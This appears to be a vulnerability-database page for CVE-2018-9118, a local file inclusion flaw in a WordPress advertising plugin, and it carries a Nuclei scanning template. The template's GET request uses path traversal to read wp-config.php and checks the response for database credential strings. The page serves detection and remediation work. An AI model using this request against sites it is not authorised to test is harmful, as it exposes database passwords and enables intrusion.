Lucene search

WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion

🗓️ 15 Jul 2021 09:40:59Reported by ProjectDiscoveryType

WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion vulnerability. Upgrade to 4.1.15

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Reporter	Title	Published	Views	Family All 10
Prion	Directory traversal	12 Apr 201815:29	–	prion
wpexploit	WP Background Takeover <= 4.1.4 - Directory Traversal	6 Apr 201800:00	–	wpexploit
Cvelist	CVE-2018-9118	12 Apr 201815:00	–	cvelist
CVE	CVE-2018-9118	12 Apr 201815:29	–	cve
Exploit DB	WordPress Plugin Background Takeover < 4.1.4 - Directory Traversal	9 Apr 201800:00	–	exploitdb
WPVulnDB	WP Background Takeover <= 4.1.4 - Directory Traversal	6 Apr 201800:00	–	wpvulndb
Patchstack	WordPress Background Takeover plugin <=4.1.4 - Directory Traversal vulnerability	9 Apr 201800:00	–	patchstack
exploitpack	WordPress Plugin Background Takeover 4.1.4 - Directory Traversal	9 Apr 201800:00	–	exploitpack
NVD	CVE-2018-9118	12 Apr 201815:29	–	nvd
OpenVAS	WordPress Multiple Plugins / Themes Directory Traversal / File Download Vulnerability (HTTP)	20 Nov 202000:00	–	openvas

Source	Link
exploit-db	www.exploit-db.com/exploits/44417
wpvulndb	www.wpvulndb.com/vulnerabilities/9056
99robots	www.99robots.com/docs/wp-background-takeover-advertisements/
nvd	www.nvd.nist.gov/vuln/detail/CVE-2018-9118
github	www.github.com/ARPSyndicate/cvemon

id: CVE-2018-9118

info:
  name: WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php.
  impact: |
    This vulnerability can lead to unauthorized access to sensitive files on the server, potentially exposing sensitive information or allowing for further exploitation.
  remediation: |
    Upgrade to 4.1.15.
  reference:
    - https://www.exploit-db.com/exploits/44417
    - https://wpvulndb.com/vulnerabilities/9056
    - https://99robots.com/docs/wp-background-takeover-advertisements/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-9118
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-9118
    cwe-id: CWE-22
    epss-score: 0.07018
    epss-percentile: 0.93949
    cpe: cpe:2.3:a:99robots:wp_background_takeover_advertisements:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: 99robots
    product: wp_background_takeover_advertisements
    framework: wordpress
  tags: cve2018,cve,edb,wordpress,wp-plugin,lfi,traversal,wp,99robots

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
          - "DB_HOST"
          - "The base configurations of the WordPress"
        condition: and
# digest: 490a00463044022014446ab9d882471c8ca3a511976ae8ff9875b3510ce8a6e8873a10a16d7d6d49022053d3bc7b06ed3457a63c6495a0af9b35b4c6050ffee46d76a3d324230e531e88:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

15 Jul 2021 09:59Current

7.5High risk

Vulners AI Score7.5

CVSS25

CVSS37.5

EPSS0.72821